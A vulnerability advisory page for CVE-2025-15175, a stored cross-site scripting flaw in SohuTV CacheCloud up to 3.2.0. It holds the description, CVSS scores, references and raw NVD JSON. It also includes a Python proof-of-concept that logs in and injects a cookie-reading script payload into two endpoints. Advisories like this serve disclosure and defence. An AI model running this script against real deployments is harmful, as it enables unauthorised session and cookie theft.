CVE-2025-15175

Description

A vulnerability was detected in SohuTV CacheCloud up to 3.2.0. Affected by this issue is the function doAppList/appCommandAnalysis of the file src/main/java/com/sohu/cache/web/controller/AppController.java. Performing manipulation results in cross site scripting. It is possible to initiate the attack remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.

CVSS Details

CVSS Score

3.5

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:sohu:cachecloud:*:*:*:*:*:*:*:* - VULNERABLE

SohuTV CacheCloud <= 3.2.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# CVE-2025-15175 PoC - SohuTV CacheCloud XSS
# Target: SohuTV CacheCloud <= 3.2.0
# Vulnerability: Stored XSS in AppController.java (doAppList/appCommandAnalysis)

TARGET_URL = "http://target.com"  # Replace with actual target
LOGIN_URL = f"{TARGET_URL}/login"
APP_LIST_URL = f"{TARGET_URL}/app/doAppList"
APP_CMD_URL = f"{TARGET_URL}/app/appCommandAnalysis"

# Login with low-privilege user
session = requests.Session()
login_data = {
    "username": "attacker",
    "password": "password"
}
session.post(LOGIN_URL, data=login_data)

# XSS Payload - Stored in doAppList function
xss_payload = "<script>alert(document.cookie)</script>"
app_list_data = {
    "appName": xss_payload,
    "appId": "12345"
}

# Inject XSS via app list
response = session.post(APP_LIST_URL, data=app_list_data)
print(f"XSS Injection Status (doAppList): {response.status_code}")

# Alternative injection via appCommandAnalysis
cmd_data = {
    "command": xss_payload,
    "instanceId": "1"
}
response = session.post(APP_CMD_URL, data=cmd_data)
print(f"XSS Injection Status (appCommandAnalysis): {response.status_code}")

# Verify XSS is stored and reflected
verify_url = f"{TARGET_URL}/app/doAppList"
response = session.get(verify_url)
if xss_payload in response.text:
    print("XSS vulnerability confirmed - payload stored and reflected")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15175
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15175
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15175/
[4] VulDB https://vuldb.com/cve/CVE-2025-15175
[5] https://github.com/sohutv/cachecloud/issues/371
[6] https://github.com/sohutv/cachecloud/issues/381
[7] https://vuldb.com/?ctiid.338560
[8] https://vuldb.com/?id.338560
[9] https://vuldb.com/?submit.716309
[10] https://vuldb.com/?submit.716322

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15175", "sourceIdentifier": "[email protected]", "published": "2025-12-29T06:15:52.350", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in SohuTV CacheCloud up to 3.2.0. Affected by this issue is the function doAppList/appCommandAnalysis of the file src/main/java/com/sohu/cache/web/controller/AppController.java. Performing manipulation results in cross site scripting. It is possible to initiate the attack remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sohu:cachecloud:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.2", "matchCriteriaId": "5185073B-FF21-405B-9765-755B5C25BEBF"}]}]}], "references": [{"url": "https://github.com/sohutv/cachecloud/issues/371", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/sohutv/cachecloud/issues/381", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://vuldb.com/?ctiid.338560", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338560", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.716309", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.716322", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}